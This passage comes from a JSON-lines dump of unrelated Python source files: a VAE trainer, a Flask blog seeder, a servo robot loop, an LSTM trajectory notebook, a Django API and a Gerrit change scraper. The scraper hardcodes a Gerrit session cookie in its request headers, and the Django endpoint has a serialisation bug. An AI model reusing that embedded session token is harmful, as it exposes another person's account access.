self.model(data)\n loss = self.loss_function(recon_batch, data, mu, logvar)\n loss.backward()\n train_loss += loss.item()\n self.optimizer.step()\n if batch_index % 100 == 0:\n print('Epoch: {} \\tLoss: {:.6f}'.format(epoch, loss.item() / len(data)))\n print('Average Train loss: {:.4f}'.format(train_loss / len(train_data.dataset)))\n\n def test(self):\n self.model.eval()\n test_loss = 0\n with torch.no_grad():\n for i, (data, _) in enumerate(test_data):\n recon_batch, mu, logvar = self.model(data)\n test_loss += self.loss_function(recon_batch, data, mu, logvar).item()\n test_loss /= len(test_data.dataset)\n print('Test loss: {:.4f}'.format(test_loss))\n\n\nclass Model(nn.Module):\n def __init__(self):\n super(Model, self).__init__()\n self.fc1 = nn.Linear(784, 400)\n self.fc21 = nn.Linear(400, 20)\n self.fc22 = nn.Linear(400, 20)\n self.fc3 = nn.Linear(20, 400)\n self.fc4 = nn.Linear(400, 784)\n\n # ReLU are used instead of sigmoid function for faster computation\n def encode(self, x):\n h1 = functional.relu(self.fc1(x))\n return self.fc21(h1), self.fc22(h1)\n\n def reparameterize(self, mu, logvar):\n std = torch.exp(0.5*logvar)\n eps = torch.randn_like(std)\n return mu + eps*std\n\n def decode(self, z):\n h3 = functional.relu(self.fc3(z))\n return torch.sigmoid(self.fc4(h3))\n\n def forward(self, x):\n mu, logvar = self.encode(x.view(-1, 784))\n z = self.reparameterize(mu, logvar)\n return self.decode(z), mu, logvar\n\n\n# download the Fashion-MNIST data using torchvision dataset\nif data_set==Dataset.fashion_mnist:\n train_data = torch.utils.data.DataLoader(datasets.FashionMNIST(data_dir, train=True, download=True, transform=transforms.ToTensor()), batch_size=batch_size, shuffle=True)\n test_data = torch.utils.data.DataLoader(datasets.FashionMNIST(data_dir, train=False, transform=transforms.ToTensor()), batch_size=batch_size, shuffle=True)\nelse:\n train_data = torch.utils.data.DataLoader(datasets.MNIST(data_dir, train=True, download=True, transform=transforms.ToTensor()), batch_size=batch_size, shuffle=True)\n test_data = torch.utils.data.DataLoader(datasets.MNIST(data_dir, train=False, transform=transforms.ToTensor()), batch_size=batch_size, shuffle=True)\n\nvae=VAE(train_data,test_data)\n# start training the model\nfor epoch in range(1, epochs + 1):\n vae.train(epoch)\n vae.test()\n with torch.no_grad():\n # generate samples\n sample = torch.randn(64, 20)\n sample = vae.model.decode(sample).cpu()\n save_image(sample.view(64, 1, 28, 28), output_dir + 'img_vae_' +str(epoch) + '.png')\n\n","sub_path":"deep-generative/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":4269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"288521955","text":"import random\nfrom myblog.models import Admin, Post, Category, Comment, Link\nfrom myblog.extensions import db\nfrom faker import Faker\nfrom sqlalchemy.exc import IntegrityError\n\nfake = Faker()\n\n\ndef fake_admin():\n admin = Admin(\n username='admin',\n blog_title='FakeBlog',\n blog_sub_title=\"I'm a fake blog\",\n name='Whale Liu',\n about='um....I actually a fake blog.',\n\n )\n db.session.add(admin)\n db.session.commit()\n\n\ndef fake_categories(count=10):\n categories = Category(name='Default')\n db.session.add(categories)\n\n for i in range(count):\n category = Category(name=fake.word())\n db.session.add(category)\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n\n\ndef fake_posts(count=50):\n for i in range(count):\n post = Post(\n title=fake.sentence(),\n body=fake.text(1500),\n category=Category.query.get(random.randint(1, Category.query.count())),\n timestamp=fake.date_time_this_year()\n )\n db.session.add(post)\n db.session.commit()\n\n\ndef fake_comments(count=500):\n for i in range(count):\n comment = Comment(\n author=fake.name(),\n body=fake.sentence(),\n timestamp=fake.date_time_this_year(),\n post=Post.query.get(random.randint(1, Post.query.count()))\n )\n db.session.add(comment)\n\n # from admin\n comment = Comment(\n author='Whale Liu',\n body=fake.sentence(),\n timestamp=fake.date_time_this_year(),\n from_admin=True,\n post=Post.query.get(random.randint(1, Post.query.count()))\n )\n db.session.add(comment)\n db.session.commit()\n\n salt = int(count/10)\n # replies\n for i in range(salt):\n comment = Comment(\n author=fake.name(),\n body=fake.sentence(),\n timestamp=fake.date_time_this_year(),\n replied=Comment.query.get(random.randint(1, Comment.query.count())),\n post=Post.query.get(random.randint(1, Post.query.count()))\n )\n db.session.add(comment)\n db.session.commit()\n\n\ndef fake_links():\n twitter = Link(name='Twitter', url='#')\n facebook = Link(name='Facebook', url='#')\n linkedin = Link(name='LinkedIn', url='#')\n google = Link(name='Google+', url='#')\n db.session.add_all([twitter, facebook, linkedin, google])\n db.session.commit()\n","sub_path":"myblog/fake.py","file_name":"fake.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"250689486","text":"from robot import Robot\nfrom servo import Servo\nimport math\nimport Adafruit_PCA9685\n\nFREQ = 60; \njoints = dict()\n\npwm = Adafruit_PCA9685.PCA9685() \npwm.set_pwm_freq(FREQ); \n\n\"\"\"\n#Foot Servo\nFOOT_CHANNEL = 0\nFOOT_MINTIME = \nFOOT_MAXTIME = \n\nfoot = Servo(pwm, FOOT_CHANNEL, FOOT_MINTIME, FOOT_MAXTIME)\n\njoints['foot'] = foot;\n\"\"\"\n\n#Shoulder Servo - HS755HB\nSHOULDER_CHANNEL = 1\nSHOULDER_MINTIME = 600\nSHOULDER_MAXTIME = 2200\n\nshoulder = Servo(pwm, SHOULDER_CHANNEL, SHOULDER_MINTIME, SHOULDER_MAXTIME)\njoints['shoulder'] = shoulder\n\n#Elbow Servo - HS645MG\nELBOW_CHANNEL = 2\nELBOW_MINTIME = 390\nELBOW_MAXTIME = 2050\n\nelbow = Servo(pwm, ELBOW_CHANNEL, ELBOW_MINTIME, ELBOW_MAXTIME)\njoints['elbow'] = elbow\n\n#Wrist Servo - HS425BB \nWRIST_CHANNEL = 3\nWRIST_MINTIME = 553\nWRIST_MAXTIME = 2520\n\nwrist = Servo(pwm, WRIST_CHANNEL, WRIST_MINTIME, WRIST_MAXTIME)\njoints['wrist'] = wrist\n\n#Neck Servo - HS422\nNECK_CHANNEL = 4\nNECK_MINTIME = 610\nNECK_MAXTIME = 2590\n\nneck = Servo(pwm, NECK_CHANNEL, NECK_MINTIME, NECK_MAXTIME)\njoints['neck'] = neck\n\n#Phone Servo - HS311\nPHONE_CHANNEL = 5\nPHONE_MINTIME = 500\nPHONE_MAXTIME = 2520\n\n#phone = Servo(pwm, PHONE_CHANNEL, PHONE_MINTIME, PHONE_MAXTIME)\n#joints['phone'] = phone\nrobit = Robot(joints)\n\nmoveSet = {\n 'shoulderGoal': 40, \n 'elbowGoal' : 70, \n 'wristGoal' : 40, \n 'neckGoal' : 76, \n 'shoulderOffset' : 10, \n 'elbowOffset' : 30, \n 'wristOffset' : 60, \n 'neckOffset' : 65 \n}\n\ntheta = 0.0\n\n\nwhile(True):\n \n for joint in joints:\n currOffset = moveSet[joint + 'Offset']\n currGoal = moveSet[joint + 'Goal']\n\n robit.setJoint(joint, currOffset + (((1+math.sin(theta)) * (currGoal - currOffset)))); \n\n #robit.setJoint('shoulder', 10 + (((1+math.sin(theta)) * (movementGoal-10))));\n #robit.setJoint('elbow', 10 + (((1+math.sin(theta)) * (movementGoal-10))));\n \n theta += 0.006\n\n\n#if __name__ == '__main__':\n# robit.executeMove(dictionary)\n #robit.setManyAngles()\n","sub_path":"rasberryCode/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"440690020","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport tensorflow as tf\nfrom tensorflow.keras import backend as K\n\nfrom tensorflow.keras.layers import TimeDistributed\nfrom tensorflow.keras.layers import LSTM\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import RepeatVector\n\nimport matplotlib as mpl\nimport pickle\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport numpy as np\nimport os\n\n# seeding for reproducible results\nfrom numpy.random import seed\nseed(1)\ntf.random.set_seed(1)\n\n# Init NuScenes. Requires the dataset to be stored on disk.\nfrom nuscenes.nuscenes import NuScenes\nfrom nuscenes.map_expansion.map_api import NuScenesMap\n\nmatplotlib.rcParams['figure.figsize'] = (24, 18)\nmatplotlib.rcParams['figure.facecolor'] = 'white'\nmatplotlib.rcParams.update({'font.size': 20})\n\nTRAIN_SIZE = 9800\nTRAIN_TIME = 6\nBATCH_SIZE = 32\nBUFFER_SIZE = 500\n\n\n# In[2]:\n\n\ntotal_ped_matrix = np.load(\"details/ego_ped_matrix.npy\")\n\nwith open(\"details/ped_dataset.pkl\", 'rb') as f:\n ped_dataset = pickle.load(f)\n \nwith open(\"details/scene_info.pkl\", 'rb') as handle:\n scene_info = pickle.load(handle)\n\n\n# In[3]:\n\n\n# nusc = NuScenes(version='v1.0-trainval', \n# dataroot='../../../../../data/', \n# verbose=False)\n\n# so_map = NuScenesMap(dataroot='../../../../../data/', \n# map_name='singapore-onenorth')\n# bs_map = NuScenesMap(dataroot='../../../../../data/', \n# map_name='boston-seaport')\n# sh_map = NuScenesMap(dataroot='../../../../../data/', \n# map_name='singapore-hollandvillage')\n# sq_map = NuScenesMap(dataroot='../../../../../data/', \n# map_name='singapore-queenstown')\n\n# # dict mapping map name to map file\n# map_files = {'singapore-onenorth': so_map,\n# 'boston-seaport': bs_map,\n# 'singapore-hollandvillage': sh_map,\n# 'singapore-queenstown': sq_map}\n\n\n# In[4]:\n\n\n# # calculating the values for standardization for every feature\n# mean_values = np.mean(total_ped_matrix[:TRAIN_SIZE, :TRAIN_TIME, :], axis=(0,1))\n# std_values = np.std(total_ped_matrix[:TRAIN_SIZE, :TRAIN_TIME, :], axis=(0,1))\n\n# # standardization\n# total_ped_matrix = (total_ped_matrix - mean_values) / std_values\n\n\n# In[5]:\n\n\n# train_test split\nx_train = total_ped_matrix[:TRAIN_SIZE, :, :TRAIN_TIME, :]\n# reshaping into 3D\nx_train = np.reshape(x_train, (x_train.shape[0], x_train.shape[2],\n x_train.shape[1]*x_train.shape[3]))\ny_train1 = total_ped_matrix[:TRAIN_SIZE, 0, TRAIN_TIME:, :2]\ny_train2 = total_ped_matrix[:TRAIN_SIZE, 1, TRAIN_TIME:, :2]\n# shape is 9800,20,2\ny_train = np.append(y_train1, y_train2, axis=1)\n\nx_test = total_ped_matrix[TRAIN_SIZE:, :, :TRAIN_TIME, :]\n# reshaping into 3D\nx_test = np.reshape(x_test, (x_test.shape[0], x_test.shape[2],\n x_test.shape[1]*x_test.shape[3]))\ny_test1 = total_ped_matrix[TRAIN_SIZE:, 0, TRAIN_TIME:, :2]\ny_test2 = total_ped_matrix[TRAIN_SIZE:, 1, TRAIN_TIME:, :2]\n# shape is 2510,20,2\ny_test = np.append(y_test1, y_test2, axis=1)\n\n\n# In[6]:\n\n\ntrain_data = tf.data.Dataset.from_tensor_slices((x_train, y_train))\ntrain_data = train_data.cache().shuffle(BUFFER_SIZE).batch(BATCH_SIZE).repeat()\n\nval_data = tf.data.Dataset.from_tensor_slices((x_test, y_test))\nval_data = val_data.batch(BATCH_SIZE).repeat()\n\n\n# In[7]:\n\n\n# defining the custom rmse loss function\ndef ttc_loss(gt_path, ego_path):\n print(ego_path)\n tot_ttc = 0.0\n tot_dist = 0.0\n for i in range(gt_path.shape[0]): #batch\n del_time = 0.0\n del_dist = np.inf\n for j in range(gt_path.shape[1]): #10 timesteps\n for k in range(ego_path.shape[1]):\n gt_pos = gt_path[i,j,:]\n ego_pos = ego_path[i,k,:]\n \n dist = np.sqrt(np.sum((gt_pos - ego_pos)**2))\n if dist < del_dist:\n del_dist = dist\n del_time = abs(j-k)\n \n tot_ttc += del_time\n tot_dist += del_dist\n tot_ttc = tot_ttc/float(len(gt_path))\n tot_dist = tot_dist/float(len(gt_path))\n return np.float32(tot_ttc) \n\ndef model_loss(gt, pred_path):\n '''\n calculates custom rmse loss between every time point\n '''\n gt_path = gt[:,:10,:]\n rmse_error = K.mean(K.sqrt(K.sum(K.square(gt_path-pred_path), axis=1)))\n \n ego_path = gt[:,10:,:]\n ttc_error = tf.numpy_function(ttc_loss, [gt_path, ego_path], tf.float32)\n # return 1./ttc_error\n return rmse_error + (2./(ttc_error+0.1))\n\ndef euc_dist(gt_path, pred_path):\n # custom metric to monitor rmse\n gt_path = gt_path[:,:10,:]\n return K.mean(K.sqrt(K.sum(K.square(gt_path-pred_path), axis=1))) \n\n\n# In[8]:\n\n\nlstm_model = tf.keras.models.Sequential()\nlstm_model.add(LSTM(32, input_shape=x_train.shape[-2:]))\nlstm_model.add(RepeatVector(10))\nlstm_model.add(LSTM(16, return_sequences=True,activation='relu'))\nlstm_model.add(LSTM(8, return_sequences=True,activation='relu'))\nlstm_model.add(TimeDistributed(\n Dense(2, activation='linear')))\n\nlstm_model.compile(optimizer='adam', \n loss=model_loss, metrics=[euc_dist])\n\n\n# In[9]:\n\n\nlstm_model.summary()\n\n\n# In[10]:\n\n\n# checkpoint for saving the best model\nfilepath=\"../checkpoints/lstm_ttc_dist_gt.hdf5\"\ncheckpoint = tf.keras.callbacks.ModelCheckpoint(filepath, monitor='val_euc_dist', \n verbose=1, save_best_only=True, mode='min')\ncallbacks_list = [checkpoint]\n\ntrain_history = lstm_model.fit(train_data, epochs=40,\n verbose=1, callbacks=None,\n validation_data=val_data,\n steps_per_epoch=300,\n validation_steps=70\n )\n\n\n# In[11]:\n\n\ndef plot_train_history(history, title):\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n\n epochs = range(len(loss))\n\n plt.figure()\n\n plt.plot(epochs, loss, 'b', label='Training loss')\n plt.plot(epochs, val_loss, 'r', label='Validation loss')\n plt.title(title)\n plt.legend()\n\n plt.show()\n\n\n# In[12]:\n\n\nplot_train_history(train_history, \"MLP train and validation loss\")\n\n\n# In[13]:\n\n\n# undo normalization for plotting\ndef move_from_origin(l, origin):\n x0, y0 = origin\n return [[x + x0, y + y0] for x, y in l]\n\ndef rotate_from_y(l, angle):\n theta = -angle\n return [(x*np.cos(theta) - y*np.sin(theta), \n x*np.sin(theta) + y*np.cos(theta)) for x, y in l]\n\n# loss calculation for test prediction\ndef rmse_error(l1, l2):\n loss = 0.0\n \n if len(np.array(l1).shape) < 2:\n return ((l1[0] - l2[0])**2 + (l1[1] - l2[1])**2)**0.5\n for p1, p2 in zip(l1, l2):\n loss += ((p1[0] - p2[0])**2 + (p1[1] - p2[1])**2)**0.5\n return (loss / float(len(l1)))\n\n\n# In[14]:\n\n\nade_values = []\nfde_values = []\n\nfor test_idx in range(TRAIN_SIZE, len(ped_dataset)):\n test_data = total_ped_matrix[test_idx:test_idx+1,:,:6,:]\n test_data = np.reshape(test_data, (test_data.shape[0], test_data.shape[2],\n test_data.shape[1]*test_data.shape[3]))\n predictions = lstm_model.predict(test_data).reshape(-1, 2)\n predictions = move_from_origin(rotate_from_y(predictions, ped_dataset[test_idx][\"angle\"]),\n ped_dataset[test_idx][\"origin\"])\n\n# n_scene = ped_dataset[test_idx][\"scene_no\"]\n# ego_poses = map_files[scene_info[str(n_scene)][\"map_name\"]].render_egoposes_on_fancy_map(\n# nusc, scene_tokens=[nusc.scene[n_scene]['token']], verbose=False,\n# render_egoposes=True, render_egoposes_range=False, \n# render_legend=False)\n\n# plt.scatter(*zip(*np.array(ped_dataset[test_idx][\"translation\"])[:6,:2]), c='k', s=5, zorder=2)\n# plt.scatter(*zip(*np.array(ped_dataset[test_idx][\"translation\"])[6:,:2]), c='b', s=5, zorder=3)\n# plt.scatter(*zip(*predictions), c='r', s=5, zorder=4)\n# plt.show()\n \n loss = rmse_error(predictions, \n np.array(ped_dataset[test_idx][\"translation\"])[6:,:2])\n final_loss = rmse_error(predictions[-1], \n np.array(ped_dataset[test_idx][\"translation\"])[-1,:2])\n\n \n# print(f\"Loss in m is {loss}\")\n# print(f\"Loss of final position in m is {final_loss}\")\n \n ade_values.append(loss)\n fde_values.append(final_loss)\n \nprint(np.mean(np.array(ade_values)))\nprint(np.mean(np.array(fde_values)))\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"python-sdk/nuscenes/map_expansion/LSTM_ttc_dist_gt.py","file_name":"LSTM_ttc_dist_gt.py","file_ext":"py","file_size_in_byte":8577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"250647497","text":"from django.http.response import HttpResponse, JsonResponse, DjangoJSONEncoder\nfrom core.models import Genre, Movie\nimport json\n\n#ping-pong for tests\ndef ping(request):\n return HttpResponse(\"pong\")\n\ndef getGenres(request, start, end):\n result = []\n for item in Genre.objects.all()[start : end]:\n result.append(\n {\n 'id': item,\n 'name': 'item.name'\n }\n )\n return JsonResponse(json.dumps(result), safe=False)","sub_path":"MyMovieList/core/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"163996082","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\nimport requests\nimport json\nimport re\nimport csv\nimport time\nimport os\nimport sys\nimport getpass\nimport XmlUtils\n#import matplotlib.pyplot as plt\n#import pandas\n#import numpy as np\n\n\n###################################################\n# Global Constants Start\n###################################################\n# gerrit网址\nGERRIT_DOMAIN = 'https://gerrit9.huaqin.com:9443/'\n\n# gerrit查询链接\nQUERY_URL = GERRIT_DOMAIN + 'changes/?q=owner:self+status:merged&n=25&O=81'\n\n# 本地代码环境路径\nLOCAL_CODE_BASE = '/base/code/sony/226-s-20210822'\n\n# manifest.xml\nMANIFEST_SOFT_LINK = '/.repo/manifest.xml'\n\n# 每页commit个数\nCHANGES_PER_PAGE = 25\n\n# 具体某个提交的gerrit链接前缀\nCERTAIN_LINK_PREFIX = GERRIT_DOMAIN + '#/c/'\n\n# 请求头带Cookie (cookie根据实时变化)\nCOOKIE_HEADERS = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36',\n 'Cookie': 'GerritAccount=aPemfaAbq74UhogBKpPnqrG8anftrZDw'}\n\n# 输出的目录\nEXPORT_DIR_PATH = '/home/ubuntu/bak/patch/sony/'\n\n# 输出csv的路径\nEXPORT_CSV_PATH = EXPORT_DIR_PATH + 'gerrit.csv'\n\n# 具体某个提交的gerrit链接请求模板, {}($1)占位为_number\nCERTAIN_LINK_TEMPLATE = GERRIT_DOMAIN + 'changes/{}/detail?O=10004'\n\n# 具体某个提交的gerrit patch , $1 -- _number , $2 --- commit_id\nDOWNLOAD_LINK_TEMPLATE = GERRIT_DOMAIN + \"changes/{}/revisions/{}/patch?zip\"\n\n# 每次请求的间隔时间\n# (总体的提交记录只需要单独爬几页,但是具体提交的commit_id需要请求到具体的gerrit链接,请求次数会较多)\nREQUEST_INTERVAL = 3\n\n# 登录url\nLOGIN_URL = GERRIT_DOMAIN + \"login/%23%2Fq%2Fstatus%3Aopen\"\n\n# 登录时的请求头\nLOGIN_REQUEST_HEADER = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'\n}\n\n# 状态码200(成功)\nSTATUS_CODE_OK = 200\n\n# 缩写的commit id (取前7位,参看git ll)\nSHORT_COMMIT_ID_LENGTH = 7\n\n# 输出date的格式\nCURRENT_DATE_PATTERN = '%Y%m%d%H%M'\n\n# 路径的分隔符\nPATH_SPERATOR = \"/\"\n\n###################################################\n# Global Constants End\n###################################################\n\n\n###################################################\n# Global Variable Start\n###################################################\n\n# 生成patch的方式\n#\n# 0 -- 不生成patch\n# 1 -- 从gerrit上下载patch\n# 2 -- 从本地代码中生成patch \nget_patch_method = 0\n\n###################################################\n# Global Variable End\n###################################################\n\n#############################################################\n# 请求访问接口,获取到json格式数据,稍加处理,写入表格。\n# 返回继续标志continue_flag,下一页URl。\n#\n# add by HQ hujingcheng 20211218 \n#############################################################\ndef request_general_info(connect_session, url, continue_flag):\n continue_flag = 1 + continue_flag\n response_data = None\n if connect_session is not None:\n response_data = connect_session.get(url, headers=LOGIN_REQUEST_HEADER)\n else:\n response_data = requests.get(url, headers=COOKIE_HEADERS)\n print(\"status_code =\", response_data.status_code)\n data = response_data.text\n #print(\"data=\", data)\n # content = data.text #你要的数据,JSON格式的\n data = remove_redundant_string(data)\n #print(\"2 data=\", data)\n data_json = json.loads(data)\n page_num = 0\n with open(EXPORT_CSV_PATH, \"a\", newline='') as csvfile:\n writer = csv.writer(csvfile)\n for one in data_json:\n page_num = page_num + 1\n change_id = str(one[\"_number\"])\n commit_id = request_certain_commit(connect_session, change_id)\n \n if get_patch_method == 1:\n download_by_url(connect_session, commit_id, change_id, EXPORT_DIR_PATH)\n elif get_patch_method == 2:\n real_project_path = get_project_path(one[\"project\"], one[\"branch\"], LOCAL_CODE_BASE)\n generate_code_patch(commit_id, real_project_path, EXPORT_DIR_PATH)\n\n writer.writerow([one[\"project\"], one[\"branch\"], one[\"subject\"], one[\"owner\"][\"name\"], CERTAIN_LINK_PREFIX + change_id, commit_id, one[\"updated\"]])\n print(one[\"project\"], one[\"branch\"], one[\"subject\"], one[\"owner\"][\"name\"], CERTAIN_LINK_PREFIX + change_id, commit_id, one[\"updated\"])\n time.sleep(REQUEST_INTERVAL)\n if page_num < CHANGES_PER_PAGE :\n print(\"last page :\",continue_flag,\"change num :\", page_num)\n continue_flag = -1\n time.sleep(REQUEST_INTERVAL)\n return continue_flag, QUERY_URL + \"&S=\" + str(continue_flag * CHANGES_PER_PAGE)\n\n\n\n#############################################################\n# 请求某个具体gerrit链接的response json\n# 返回commit_id\n#\n# add by HQ hujingcheng 20211218 \n#############################################################\ndef request_certain_commit(connect_session, num):\n url = CERTAIN_LINK_TEMPLATE.format(str(num))\n print(\"url =\" + url)\n data = None\n if connect_session is None:\n data = requests.get(url, headers= COOKIE_HEADERS).text\n else:\n data = connect_session.get(url, headers= LOGIN_REQUEST_HEADER).text\n data = remove_redundant_string(data)\n #print(\"333 data =\" + data)\n data_json = json.loads(data)\n print(\"commit_id =\"+data_json[\"current_revision\"])\n return data_json[\"current_revision\"]\n\n\n\n#############################################################\n# 去除ajax返回response中 ,json串前几个无用字符 “ )]}' ”\n# 返回 过滤后的字符串\n#\n# add by HQ hujingcheng 20211218 \n#############################################################\ndef remove_redundant_string(data):\n remove = re.compile('\\)\\]\\}\\'')\n data = re.sub(remove, \"\", data)\n return data\n\n\n#############################################################\n# 登录给定网址\n# 参数 url -- 给定网址 , username -- 用户名 , password -- 密码\n# 返回 状态码\n#\n# add by HQ hujingcheng 20211225 \n#############################################################\ndef login_site(login_session, url, username, password):\n login_response = login_session.post(url, data = { 'username': username, 'password': password }, headers = LOGIN_REQUEST_HEADER)\n print(\"login response =\", login_response)\n if login_response:\n print(\"login status code =\",login_response.status_code)\n if login_response.status_code == STATUS_CODE_OK:\n print(\"login success\")\n else:\n print(\"login failed\")\n return login_response.status_code\n return -1\n\n\n#############################################################\n# 输入用户名/密码\n# 参数 \n# 返回 username (str) ,password (str) \n#\n# add by HQ hujingcheng 20211225 \n#############################################################\ndef input_user_profile():\n print(\"Login url is \", LOGIN_URL)\n print(\"csv save path is \", EXPORT_CSV_PATH)\n username = input(\"Please input your username: \")\n password = getpass.getpass(\"Please input your password: \")\n return username,password\n\n\n#############################################################\n# 判断str是否为空\n# 参数 输入str\n# 返回 boolean\n#\n# add by HQ hujingcheng 20211225 \n#############################################################\ndef str_is_empty(input_str):\n if input_str.strip() == '':\n return True\n return False\n\n\n#############################################################\n# 根据url下载\n# 参数 url -- str\n# 返回 boolean\n#\n# add by HQ hujingcheng 20211230 \n#############################################################\ndef download_by_url(connect_session, commit_id, change_id, path):\n download_response = None\n if str_is_empty(commit_id) or str_is_empty(change_id):\n print(\"commit_id or change_id is empty\")\n return False\n download_url = DOWNLOAD_LINK_TEMPLATE.format(str(change_id), commit_id)\n if connect_session is None:\n download_response = requests.get(download_url, headers=COOKIE_HEADERS, stream=True)\n print(\"cookie download_by url:\", download_url, \",path:\", path)\n else:\n download_response = connect_session.get(download_url, headers=LOGIN_REQUEST_HEADER, stream=True)\n print(\"login download_by url:\", download_url, \",path:\", path)\n if download_response is None:\n print(\"can not get download response\")\n return False\n if download_response.status_code != STATUS_CODE_OK:\n print(\"download response error:\",download_response.status_code)\n return False\n if download_response.iter_content is None:\n print(\"can not get download content\")\n return False\n short_commit = get_short_commit(commit_id)\n download_dir = path + \"gerrit_\" + get_current_date(CURRENT_DATE_PATTERN) + PATH_SPERATOR + short_commit + PATH_SPERATOR\n print(\"download_dir is:\", download_dir)\n if not os.path.exists(download_dir):\n os.makedirs(download_dir)\n download_patch_path = download_dir + PATH_SPERATOR + short_commit + '.diff.zip'\n with open(download_patch_path, \"wb\") as writer:\n for chunk in download_response.iter_content(chunk_size=512):\n if chunk:\n writer.write(chunk)\n return True\n\n\n\n#############################################################\n# 获取commit_id的前7位作为标识\n# 参数 commit_id -- str\n# 返回 str\n#\n# add by HQ hujingcheng 20211230 \n#############################################################\ndef get_short_commit(commit_id):\n if not str_is_empty(commit_id):\n if len(commit_id) >= SHORT_COMMIT_ID_LENGTH:\n commit_id = commit_id[:SHORT_COMMIT_ID_LENGTH]\n return commit_id\n\n\n#############################################################\n# 获取当前时间\n# 返回 str -- %Y%m%d%H%M\n#\n# add by HQ hujingcheng 20211231 \n#############################################################\ndef get_current_date(pattern):\n return time.strftime(pattern, time.localtime()) \n\n\n#############################################################\n# 获取manifest.xml软链接指向的路径\n# 返回 str -- 绝对路径\n#\n# add by HQ hujingcheng 20220105 \n#############################################################\ndef get_real_manifest(slink):\n if os.path.islink(slink):\n return os.path.realpath(slink)\n return None\n\n#############################################################\n# 根据从gerrit网站上获取的project和branch信息\n# ,在代码的manifest.xml中获取到代码中实际仓库路径\n#\n# 返回 str -- 代码中仓库路径\n#\n# add by HQ hujingcheng 20220105 \n#############################################################\ndef get_project_path(project_name, branch_name, code_path):\n manifest_real_path = os.path.realpath(code_path + MANIFEST_SOFT_LINK)\n tree = XmlUtils.read_xml(manifest_real_path)\n project_nodes = tree.findall(\"project\")\n kv_map = {\"name\": project_name, \"revision\": branch_name}\n for node in project_nodes:\n if XmlUtils.check_node_by_attribute(node, kv_map):\n project_path = node.get(\"path\")\n #print(\"project_path =\", project_path)\n return project_path\n return None\n\n\n#############################################################\n# 根据url下载\n# 参数 url -- str\n# 返回 boolean\n#\n# add by HQ hujingcheng 20211230 \n#############################################################\ndef generate_code_patch(commit_id, real_project_path, output_path):\n short_commit = get_short_commit(commit_id)\n download_dir = output_path + \"gerrit_\" + get_current_date(CURRENT_DATE_PATTERN) + PATH_SPERATOR + short_commit + PATH_SPERATOR\n if not os.path.exists(download_dir):\n os.makedirs(download_dir)\n os.system(\"cd \" + real_project_path)\n os.system(\"git_patch_generate \" + short_commit)\n os.system(\"mv -f \")\n \n\n#两个字符串转int 相减计算大小\ndef time_cmp(first_time, second_time):\n print(first_time)\n print(second_time)\n return int(first_time) - int(second_time)\n\n#对时间\"2017-12-11 02:07:27.000000000\"格式化为20171211020727\ndef time_format(time):\n time = time.replace('.000000000', \"\")\n time = time.replace(' ', \"\")\n time = time.replace(':', \"\")\n time = time.replace('-', \"\")\n return time\n\n'''\n#用正则表达式统计不符合规范的人员及其出现的个数 得到一个DataFrame\ndef subject_format_count():\n nonstandard_count={}\n #newline=' '可以防止两行之间出现空行\n with open(r\"gerrit.csv\",newline='') as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n for row in readCSV:\n matchObj = re.match(r\"^TFS_\\d+:\" + row[3] + \"_\\D+\\w+:.+\", row[2])\n if matchObj:\n pass\n else:\n if row[3] in nonstandard_count:\n nonstandard_count[row[3]] += 1\n else:\n nonstandard_count[row[3]] = 1\n #去掉统进来的标签\n nonstandard_count.pop('owner')\n #按出现次数递减排序\n sort_nonstandard_count = sorted(nonstandard_count.items(), key=lambda v: v[1], reverse=True)\n #这地方的设置可以先查看sort_nonstandard_count 然后看看具体要的是哪个值 根据这里再写可视化\n df = pandas.DataFrame(sort_nonstandard_count, index=[item[0] for item in sort_nonstandard_count])\n return df\n\n'''\n\n##可视化处理###############\n'''\ndef view_format_count(df):\n # x为横坐标刻度\n x = np.arange(len(df.index))\n # 设置y轴的数值,取df的1列,0列为横坐标\n y = np.array(df[1])\n # 设置x横坐标显示为0列的名字\n xticks1 = np.array(df[0])\n # 设置横坐标格式 倾斜30°\n plt.xticks(x, xticks1, size='small', rotation=30)\n # 画出柱状图 appha为透明度\n plt.bar(x, y, width=0.35, align='center', color='c', alpha=0.8)\n # 在柱形图上方显示y值 zip(x,y)得到的是tuple列表 即各列顶点的坐标\n # 然后再各列的顶点上方0.05设置一个文本 ha水平对齐left,right,center va垂直对齐 'center' , 'top' , 'bottom' ,'baseline'\n for a, b in zip(x,y):\n plt.text(a, b + 0.05, '%.0f' %b, ha='center', va='bottom', fontsize=11)\n plt.show()\n\n'''\n\n###################################################\n# Main Script\n###################################################\ndef main():\n global get_patch_method\n #print(\"manifest.xml real path is\", os.path.realpath(LOCAL_CODE_BASE + MANIFEST_SOFT_LINK))\n #XmlUtils.test()\n #get_project_path('','',LOCAL_CODE_BASE)\n for i in range(len(sys.argv)):\n if \"-p\" == sys.argv[i]:\n get_patch_method = 1\n print(\"\\033[1;31;40m Warning!!! \\033[0m\")\n print(\"\\033[1;31;40m You will download the patch from gerrit server! \\033[0m\")\n elif \"-l\" == sys.argv[i]:\n if not os.path.exists(LOCAL_CODE_BASE):\n print(\"\\033[1;31;40mWarning!!! code base:\", 